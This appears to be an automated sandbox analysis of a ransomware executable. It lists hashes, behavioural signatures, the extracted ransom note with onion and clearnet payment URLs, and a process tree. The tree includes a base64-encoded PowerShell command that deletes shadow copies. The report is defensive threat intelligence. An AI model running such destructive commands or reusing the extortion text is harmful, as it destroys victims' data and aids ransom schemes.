Analysis

  • max time kernel
    141s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    05-03-2022 23:21

General

  • Target

    0243ddd90fb70d1a7a6714bce75072254cde9bdb8c36ed2271b49a9aa190d9d5.exe

  • Size

    272KB

  • MD5

    ab1aaa8f96c61684736da00ece5a9c83

  • SHA1

    c41435392d0759af778dd24ea303136b02469123

  • SHA256

    0243ddd90fb70d1a7a6714bce75072254cde9bdb8c36ed2271b49a9aa190d9d5

  • SHA512

    ba25c53c7b5aeea57cde0540071292a7f1b77557ba72119f5fbdf95e840b04e994c81a4a7248375c272eeb34ebe3f41f5ae7f0acc0d3fece477634e6caf28515

Score
10/10

Malware Config

Extracted

Path

C:\7358kd+readme.txt

Ransom Note
--=Welcome.Again.==- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 7358kd. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/08D920D8768424D0 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/08D920D8768424D0 Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: eoqslgEdM5aQVVZlmqOKTHQRE7G1AR+mu56RUOVfxbS2LWu+QdcHpDypgT9f4Ciz TxtxiU8Tv0OcWHTMN+E76Zmx+gIuQvYCeKiWTH7ypgR13rPIOTCl40VcfijheCYd FE9lOkGPtKFHAjVoMJCGoypMMAUwweEeGWPP6T69H0Cz3Je5f+nkOfoddJiSXXmX MA3jKwX5FDal4c/TmZ1BTPps9IHRSsCca+kRjhRkboC40BMKJqPTQJa1y91mb+bo caPttvhYcMjzU2BDbRgWFa/OAtaycQHSWEpT2qJiWg+qyXRU59sFvemOCt/WymOh QeAlZvgp4+F5bywQBtlsdf4br/eQ/GGbB+3nGGIA8UB6atTphaQhrZv5rrTfyfS9 XBXknpmt3+CyMecXt7s5EciVGqmhNB4Kz9lBEvmCNcMO9Q37JVdmWICc9WN7ezO2 4CRnDTgwckO4mzSMw0GfbHbeqZdp+YRogwzfoJdZy1KwlFhgOzwwx3lkkzaCxMgY wUYABuH3Lhl013eQGIQ4kAzshZENvVUJiyxlnSTo4GfwHQSRWUf5bW5VMkEQ9fy4 SLLFBSwq/5LRH8IP2K/k8+B3QGCeIp2YsrRnBcfsSDtTVpJ1KtaH0Mdn270SJu2z qSoHxNNsbPTwnM15p/SNujpzf3edj5AJcU0fehrSJN6h8Mtlp2QlNYBBRzusos67 6kKf1Uq8eouwD9ArG9MW8+JA/ZlVTShg2XG//46cFnac7XAwJf1du33+p/wqCokl yhdFkSQ3KQyvfGHGWncwizHxRvXsvQpipsx69Bso4EN7wiau5qQ7RO6oyvs3g0cJ rBHzYXfIi3b74cb8g0B+qmkD0x13oqTqiloSFl6JrF0Y0O0+SbwMUXicgxKwHSzB h4kxOMZccS/nIalbN59tUG739inW0qp2QTaBJq84EIpLw0Z/nya0eevD1PnLli0N BCwfM+RKG7ycwrGhxbeasEPnbYPgHIL/dQeLQn6Du4Xfuqj6YNUg/tG3UPU4FOBO WqAkMOwOXch4hxGjrQ3bevIMI9gCeAAs60QUddyNujjn3Kr23dPOtBOQPhwJAPmt tK0ryGjVmyOm1EFSjpKNrHI/xqnFdH0W0oJZ5Nifoy867GDGGqvYIjYZkVWFgGTb AkBWib52PP58Ndn8kun7PBMH/SZIYUh2183sXMHUp9Ltsc6I72XCwIFFX5EY5RHK 5P2bXlVq228QW5rSeYvBAK/KNhLCOafoXeeNaySqCoN29XsOPjmKsOJfpriEW3Ed +eJLOgJvpEq8768r1iYsdKTTLk0= Extension name: 7358kd ----------------------------------------------------------------------------------------- !!! !!! !!! !!! !!! !!! !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! !!! !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!! !!! !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/08D920D8768424D0

http://decryptor.cc/08D920D8768424D0

Signatures

  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0243ddd90fb70d1a7a6714bce75072254cde9bdb8c36ed2271b49a9aa190d9d5.exe
    "C:\Users\Admin\AppData\Local\Temp\0243ddd90fb70d1a7a6714bce75072254cde9bdb8c36ed2271b49a9aa190d9d5.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1636
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1088
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
    PID:1632
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1032

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/1088-56-0x000007FEFC4A1000-0x000007FEFC4A3000-memory.dmp
    Filesize: 8KB

  • memory/1088-57-0x000007FEF3510000-0x000007FEF406D000-memory.dmp
    Filesize: 11.4MB

  • memory/1088-58-0x000007FEF5980000-0x000007FEF631D000-memory.dmp
    Filesize: 9.6MB

  • memory/1088-60-0x0000000002900000-0x0000000002902000-memory.dmp
    Filesize: 8KB

  • memory/1088-59-0x000000000290B000-0x000000000292A000-memory.dmp
    Filesize: 124KB

  • memory/1088-63-0x0000000002904000-0x0000000002907000-memory.dmp
    Filesize: 12KB

  • memory/1088-62-0x0000000002902000-0x0000000002904000-memory.dmp
    Filesize: 8KB

  • memory/1088-61-0x000007FEF5980000-0x000007FEF631D000-memory.dmp
    Filesize: 9.6MB

  • memory/1636-55-0x0000000076921000-0x0000000076923000-memory.dmp
    Filesize: 8KB